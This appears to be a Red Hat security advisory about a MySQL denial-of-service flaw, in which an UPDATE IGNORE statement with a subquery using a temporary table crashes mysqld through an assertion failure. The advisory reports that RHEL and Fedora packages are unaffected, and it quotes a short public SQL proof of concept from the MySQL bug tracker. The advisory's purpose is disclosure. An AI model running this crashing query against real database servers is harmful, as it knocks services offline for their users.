It was found that the MySQL server did not properly handle SQL UPDATE IGNORE statements that included a subquery evaluated using a temporary table. A remote attacker with a valid SQL user account could use this flaw to cause a denial of service (the mysqld daemon terminating with an assertion failure).

References:
[1] http://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html
[2] http://bugs.mysql.com/bug.php?id=54543

Note: On Red Hat Enterprise Linux systems, the mysqld daemon is not compiled with built-in assertion check support, so it would not be affected by this issue.

Public PoC from [2]:
====================
drop table if exists `t1`;
create table `t1`(`a` int not null)engine=myisam;
insert into `t1` values (1),(2),(3);
update ignore (select (select count(*) from `t1` group by @@server_id, `a`) as `a` from `t1`) `x`,`t1` set `t1`.`a`=`x`.`a`;

This issue did NOT affect the versions of the mysql package as shipped with Red Hat Enterprise Linux 4, 5, or 6.

This issue did NOT affect the versions of the mysql package as shipped with Fedora 14 and 15.